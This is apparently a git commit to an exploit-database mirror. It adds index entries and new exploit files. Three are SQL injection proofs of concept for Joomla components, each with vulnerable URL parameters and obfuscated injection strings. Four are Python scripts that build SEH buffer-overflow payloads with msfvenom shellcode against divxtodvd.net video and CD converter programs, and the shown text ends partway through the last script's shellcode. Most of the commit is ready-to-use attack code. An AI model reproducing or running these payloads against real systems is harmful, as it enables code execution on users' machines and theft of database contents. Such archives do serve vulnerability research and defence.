DB: 2017-08-26

7 new exploits MP3 WAV to CD Burner 1.4.24 - Buffer Overflow (SEH) My Video Converter 1.5.24 - Buffer Overflow (SEH) Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 - Buffer Overflow (SEH) Easy AVI DivX Converter 1.2.24 - Buffer Overflow (SEH) Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2) Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1) Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2) Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1) Joomla! Component Bargain Product VM3 1.0 - 'product_id' Parameter SQL Injection Joomla! Component Price Alert 3.0.2 - 'product_id' Parameter SQL Injection Joomla! Component MasterForms 1.0.3 - SQL Injection
2017-08-26 05:01:24 +00:00 · 2017-08-26 05:01:24 +00:00 · c388cc7a95
commit c388cc7a95
parent d4775ec75b
8 changed files with 343 additions and 4 deletions
--- a/files.csv
+++ b/files.csv
@ -8918,6 +8918,7 @@ id,file,description,date,author,platform,type,port
 39814,platforms/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
 39820,platforms/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
 39843,platforms/windows/local/39843.c,"VirIT Explorer Lite & Pro 8.1.68 - Privilege Escalation",2016-05-19,"Paolo Stagno",windows,local,0
+42551,platforms/windows/local/42551.py,"MP3 WAV to CD Burner 1.4.24 - Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",windows,local,0
 39845,platforms/windows/local/39845.txt,"Operation Technology ETAP 14.1.0 - Privilege Escalation",2016-05-23,LiquidWorm,windows,local,0
 39888,platforms/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Privilege Escalation",2016-06-06,"Gregory Smiley",windows,local,0
 39902,platforms/windows/local/39902.txt,"League of Legends Screensaver - Unquoted Service Path Privilege Escalation",2016-06-07,"Vincent Yiu",windows,local,0
@ -8952,6 +8953,7 @@ id,file,description,date,author,platform,type,port
 40148,platforms/windows/local/40148.py,"Mediacoder 0.8.43.5852 - '.m3u' (SEH)",2016-07-25,"Karn Ganeshen",windows,local,0
 40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - '.m3u' File Stack Overflow (Egghunter + ASLR Bypass)",2016-07-25,"Karn Ganeshen",windows,local,0
 40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys' (PoC)",2013-03-06,"Artem Shishkin",multiple,local,0
+42550,platforms/windows/local/42550.py,"My Video Converter 1.5.24 - Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",windows,local,0
 40169,platforms/linux/local/40169.txt,"VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation",2013-08-22,"Tavis Ormandy",linux,local,0
 40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0
 40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0
@ -9140,6 +9142,7 @@ id,file,description,date,author,platform,type,port
 41873,platforms/osx/local/41873.sh,"GNS3 Mac OS-X 1.5.2 - 'ubridge' Privilege Escalation",2017-04-13,"Hacker Fantastic",osx,local,0
 41875,platforms/linux/local/41875.py,"PonyOS 4.0 - 'fluttershy' LD_LIBRARY_PATH Kernel Privilege Escalation",2017-04-02,"Hacker Fantastic",linux,local,0
 41878,platforms/windows/local/41878.txt,"Adobe Creative Cloud Desktop Application < 4.0.0.185 - Privilege Escalation",2017-04-13,hyp3rlinx,windows,local,0
+42548,platforms/windows/local/42548.py,"Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 - Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",windows,local,0
 41901,platforms/windows/local/41901.cs,"Microsoft Windows 10 (Build 10586) - 'IEETWCollector' Arbitrary Directory/File Deletion Privilege Escalation",2017-04-20,"Google Security Research",windows,local,0
 41902,platforms/windows/local/41902.txt,"Microsoft Windows 10 - Runtime Broker ClipboardBroker Privilege Escalation",2017-04-20,"Google Security Research",windows,local,0
 41904,platforms/multiple/local/41904.txt,"Oracle VM VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy",2017-04-20,"Google Security Research",multiple,local,0
@ -9195,6 +9198,7 @@ id,file,description,date,author,platform,type,port
 42357,platforms/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",linux,local,0
 42368,platforms/win_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,win_x86-64,local,0
 42382,platforms/windows/local/42382.rb,"Microsoft Windows - LNK Shortcut File Code Execution (Metasploit)",2017-07-26,"Yorick Koster",windows,local,0
+42549,platforms/windows/local/42549.py,"Easy AVI DivX Converter 1.2.24 - Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",windows,local,0
 42385,platforms/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
 42407,platforms/multiple/local/42407.txt,"iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation",2017-08-01,"Google Security Research",multiple,local,0
 42418,platforms/windows/local/42418.rb,"Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit)",2017-08-02,Metasploit,windows,local,0
@ -16101,7 +16105,7 @@ id,file,description,date,author,platform,type,port
 13649,platforms/windows/shellcode/13649.txt,"Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",windows,shellcode,0
 13661,platforms/lin_x86/shellcode/13661.txt,"Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode",2010-04-02,anonymous,lin_x86,shellcode,0
 13669,platforms/lin_x86/shellcode/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0
-13670,platforms/lin_x86-64/shellcode/13670.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes)",2010-04-14,Magnefikko,lin_x86-64,shellcode,0
+13670,platforms/lin_x86-64/shellcode/13670.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2)",2010-04-14,Magnefikko,lin_x86-64,shellcode,0
 13671,platforms/lin_x86/shellcode/13671.c,"Linux/x86 - DoS Badger Game Shellcode (6 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0
 13673,platforms/lin_x86/shellcode/13673.c,"Linux/x86 - DoS SLoc Shellcode (55 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0
 13675,platforms/lin_x86/shellcode/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,lin_x86,shellcode,0
@ -16319,7 +16323,7 @@ id,file,description,date,author,platform,type,port
 39519,platforms/win_x86/shellcode/39519.c,"Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win_x86,shellcode,0
 39578,platforms/lin_x86-64/shellcode/39578.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
 39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86-64 - execve /bin/sh Shellcode (26 bytes)",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0
-39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
+39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
 39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86-64 - execve /bin/bash Shellcode (33 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
 39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
 39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0
@ -16399,12 +16403,12 @@ id,file,description,date,author,platform,type,port
 41750,platforms/lin_x86-64/shellcode/41750.txt,"Linux/x86-64 - execve /bin/sh Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode,0
 41757,platforms/lin_x86/shellcode/41757.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2017-03-29,WangYihang,lin_x86,shellcode,0
 41827,platforms/win_x86-64/shellcode/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",win_x86-64,shellcode,0
-41883,platforms/lin_x86-64/shellcode/41883.txt,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes)",2017-04-13,WangYihang,lin_x86-64,shellcode,0
+41883,platforms/lin_x86-64/shellcode/41883.txt,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2)",2017-04-13,WangYihang,lin_x86-64,shellcode,0
 41909,platforms/lin_x86/shellcode/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,lin_x86,shellcode,0
 41969,platforms/lin_x86/shellcode/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,lin_x86,shellcode,0
 41970,platforms/lin_x86-64/shellcode/41970.asm,"Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,lin_x86-64,shellcode,0
 42016,platforms/windows/shellcode/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",windows,shellcode,0
-42126,platforms/lin_x86-64/shellcode/42126.c,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes)",2017-06-05,"Touhid M.Shaikh",lin_x86-64,shellcode,0
+42126,platforms/lin_x86-64/shellcode/42126.c,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",lin_x86-64,shellcode,0
 42177,platforms/lin_x86/shellcode/42177.c,"Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,lin_x86,shellcode,0
 42179,platforms/lin_x86-64/shellcode/42179.c,"Linux/x86-64 - execve /bin/sh Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode,0
 42208,platforms/lin_x86/shellcode/42208.nasm,"Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode,0
@ -36915,6 +36919,9 @@ id,file,description,date,author,platform,type,port
 39145,platforms/cgi/webapps/39145.txt,"Xangati XSR / XNR - 'gui_input_test.pl' Remote Command Execution",2014-04-14,"Jan Kadijk",cgi,webapps,0
 39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar - 'day_view.php' SQL Injection",2014-04-14,"Daniel Godoy",php,webapps,0
 39150,platforms/php/webapps/39150.txt,"Open Audit - SQL Injection",2016-01-02,"Rahul Pratap Singh",php,webapps,0
+42552,platforms/php/webapps/42552.txt,"Joomla! Component Bargain Product VM3 1.0 - 'product_id' Parameter SQL Injection",2017-08-24,"Ihsan Sencan",php,webapps,0
+42553,platforms/php/webapps/42553.txt,"Joomla! Component Price Alert 3.0.2 - 'product_id' Parameter SQL Injection",2017-08-24,"Ihsan Sencan",php,webapps,0
+42554,platforms/php/webapps/42554.txt,"Joomla! Component MasterForms 1.0.3 - SQL Injection",2017-08-24,"Ihsan Sencan",php,webapps,0
 39153,platforms/php/webapps/39153.txt,"iDevAffiliate - 'idevads.php' SQL Injection",2014-04-22,"Robert Cooper",php,webapps,0
 39156,platforms/cgi/webapps/39156.txt,"ZamFoo - Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0
 39157,platforms/php/webapps/39157.txt,"Puntopy - 'novedad.php' SQL Injection",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0
--- a/platforms/php/webapps/42552.txt
+++ b/platforms/php/webapps/42552.txt
@ -0,0 +1,28 @@
+# # # # # 
+# Exploit Title: Joomla! Component Bargain Product VM3 1.0 - SQL Injection
+# Dork: N/A
+# Date: 25.08.2017
+# Vendor Homepage: https://www.weborange.eu/
+# Software Link: https://www.weborange.eu/extensions/index.php/extensions-vm3/bargain-product-vm3-detail
+# Demo: http://www.weborange.eu/demo/index.php/bargain-product
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=brainy&product_id=[SQL]
+# http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=alice&product_id=[SQL]
+#
+# 17+OR+0x3231323232+/*!00005Group*/+BY+/*!00005ConcAT_WS*/(0x3a,0x496873616e2053656e63616e,VersioN(),FLooR(RaND(0)*0x32))+/*!00005havinG*/+min(0)+OR+0x31
+#
+# Etc..
+# # # # #
--- a/platforms/php/webapps/42553.txt
+++ b/platforms/php/webapps/42553.txt
@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Joomla! Component Price Alert 3.0.2 - SQL Injection
+# Dork: N/A
+# Date: 25.08.2017
+# Vendor Homepage: https://www.weborange.eu/
+# Software Link: https://extensions.joomla.org/extensions/extension/extension-specific/virtuemart-extensions/price-alert/
+# Demo: https://www.weborange.eu/extensions/index.php/extensions-vm3/price-alert-detail
+# Version: 3.0.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?option=com_price_alert&view=subscribeajax&task=pricealert_ajax&product_id=[SQL]
+#
+# 64+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
+#
+# Etc..
+# # # # #
--- a/platforms/php/webapps/42554.txt
+++ b/platforms/php/webapps/42554.txt
@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Joomla! Component MasterForms 1.0.3 - SQL Injection
+# Dork: N/A
+# Date: 25.08.2017
+# Vendor Homepage: https://masterformsbuilder.com/
+# Software Link: https://www.joomlamasterforms.com/download?file=masterforms_v.1.0.3_j3.3.zip
+# Demo: https://demo.masterformsbuilder.com/
+# Version: 1.0.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?option=com_masterforms&layout=form&formid=[SQL]
+#
+# 1'+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)--+-
+#
+# Etc..
+# # # # #
--- a/platforms/windows/local/42548.py
+++ b/platforms/windows/local/42548.py
@ -0,0 +1,59 @@
+#!/usr/bin/python
+ 
+###############################################################################
+# Exploit Title:        Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 - 'Enter User Name' Field Buffer Overflow (SEH)
+# Date:                 24-08-2017
+# Exploit Author:       Anurag Srivastava 
+# Website:		www.pyramidcyber.com
+# Vulnerable Software:  Easy Video to iPod/MP4/PSP/3GP Converter 
+# Vendor Homepage:      http://www.divxtodvd.net/
+# Version:              1.5.20
+# Software Link:        http://www.divxtodvd.net/easy_ipod_mp4_psp_3gp.exe
+# Tested On:            Windows 7 x64 
+#
+#
+# To reproduce the exploit:
+#   1. Click Register
+#   2. In the "Enter User Name" field, paste the content of pyramid.txt
+#
+##############################################################################
+ 
+
+buffer = "\x41" * 1008   
+ 
+nSEH = "\xeb\x10\x90\x90"
+ 
+# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
+SEH = "\x59\x78\x03\x10"
+ 
+badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
+ 
+# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
+buf =  ""
+buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
+buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
+buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
+buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
+buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
+buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
+buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
+buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
+buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
+buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
+buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
+buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
+buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
+buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
+buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
+buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
+buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
+ 
+nops = "\x90" * 16
+ 
+badchars = "\x0a\x0d"
+ 
+data = buffer + nSEH + SEH + nops + buf
+ 
+f = open ("pyramid.txt", "w")
+f.write(data)
+f.close()
--- a/platforms/windows/local/42549.py
+++ b/platforms/windows/local/42549.py
@ -0,0 +1,59 @@
+#!/usr/bin/python
+ 
+###############################################################################
+# Exploit Title:        Easy AVI DivX Converter 1.2.24 - 'Enter User Name' Field Buffer Overflow (SEH)
+# Date:                 24-08-2017
+# Exploit Author:       Anurag Srivastava 
+# Website:		www.pyramidcyber.com
+# Vulnerable Software:  Easy AVI DivX Converter 
+# Vendor Homepage:      http://www.divxtodvd.net/
+# Version:              1.2.24
+# Software Link:        http://www.divxtodvd.net/easy_avi_converter.exe
+# Tested On:            Windows 7 x64 
+#
+#
+# To reproduce the exploit:
+#   1. Click Register
+#   2. In the "Enter User Name" field, paste the content of pyramid.txt
+#
+##############################################################################
+ 
+
+buffer = "\x41" * 1008   
+ 
+nSEH = "\xeb\x10\x90\x90"
+ 
+# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
+SEH = "\x59\x78\x03\x10"
+ 
+badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
+ 
+# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
+buf =  ""
+buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
+buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
+buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
+buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
+buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
+buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
+buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
+buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
+buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
+buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
+buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
+buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
+buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
+buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
+buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
+buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
+buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
+ 
+nops = "\x90" * 16
+ 
+badchars = "\x0a\x0d"
+ 
+data = buffer + nSEH + SEH + nops + buf
+ 
+f = open ("pyramid.txt", "w")
+f.write(data)
+f.close()
--- a/platforms/windows/local/42550.py
+++ b/platforms/windows/local/42550.py
@ -0,0 +1,59 @@
+#!/usr/bin/python
+ 
+###############################################################################
+# Exploit Title:        My Video Converter 1.5.24 - 'Enter User Name' Field Buffer Overflow (SEH)
+# Date:                 24-08-2017
+# Exploit Author:       Anurag Srivastava 
+# Website:		www.pyramidcyber.com
+# Vulnerable Software:  My Video Converter 1.5.24 
+# Vendor Homepage:      http://www.divxtodvd.net/
+# Version:              1.5.24
+# Software Link:        http://www.divxtodvd.net/my_video_converter.exe
+# Tested On:            Windows 7 x64 
+#
+#
+# To reproduce the exploit:
+#   1. Click Register
+#   2. In the "Enter User Name" field, paste the content of pyramid.txt
+#
+##############################################################################
+ 
+
+buffer = "\x41" * 1008   
+ 
+nSEH = "\xeb\x10\x90\x90"
+ 
+# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
+SEH = "\x59\x78\x03\x10"
+ 
+badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
+ 
+# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
+buf =  ""
+buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
+buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
+buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
+buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
+buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
+buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
+buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
+buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
+buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
+buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
+buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
+buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
+buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
+buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
+buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
+buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
+buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
+ 
+nops = "\x90" * 16
+ 
+badchars = "\x0a\x0d"
+ 
+data = buffer + nSEH + SEH + nops + buf
+ 
+f = open ("pyramid.txt", "w")
+f.write(data)
+f.close()
--- a/platforms/windows/local/42551.py
+++ b/platforms/windows/local/42551.py
@ -0,0 +1,73 @@
+#!/usr/bin/python
+ 
+###############################################################################
+# Exploit Title:        MP3 WAV to CD Burner 1.4.24 - 'Enter User Name' Field Buffer Overflow (SEH)
+# Date:                 24-08-2017
+# Exploit Author:       Anurag Srivastava 
+# Website:		www.pyramidcyber.com
+# Vulnerable Software:  MP3 WAV to CD Burner 
+# Vendor Homepage:      http://www.divxtodvd.net/
+# Version:              1.4.24
+# Software Link:        http://www.divxtodvd.net/mp3_cd_burner.exe
+# Tested On:            Windows 7 x64 
+#   All the vendor's softwares below are affected to this bug which all can be found in http://www.divxtodvd.net/ till date 24-08-2017 .
+#   Easy MPEG/AVI/DIVX/WMV/RM to DVD
+#   Easy Avi/Divx/Xvid to DVD Burner
+#   Easy MPEG to DVD Burner
+#   Easy WMV/ASF/ASX to DVD Burner
+#   Easy RM RMVB to DVD Burner
+#   Easy CD DVD Copy
+#   MP3/AVI/MPEG/WMV/RM to Audio CD Burner
+#   MP3/WAV/OGG/WMA/AC3 to CD Burner
+#   Easy MOV Converter
+#   Easy Video to iPod Converter
+#   Easy Video to PSP Converter
+#   Easy Video to 3GP Converter
+#   Easy Video to MP4 Converter
+#
+#
+# To reproduce the exploit:
+#   1. Click Register
+#   2. In the "Enter User Name" field, paste the content of pyramid.txt
+#
+##############################################################################
+ 
+
+buffer = "\x41" * 1008   
+ 
+nSEH = "\xeb\x10\x90\x90"
+ 
+# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
+SEH = "\x59\x78\x03\x10"
+ 
+badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
+ 
+# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
+buf =  ""
+buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
+buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
+buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
+buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
+buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
+buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
+buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
+buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
+buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
+buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
+buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
+buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
+buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
+buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
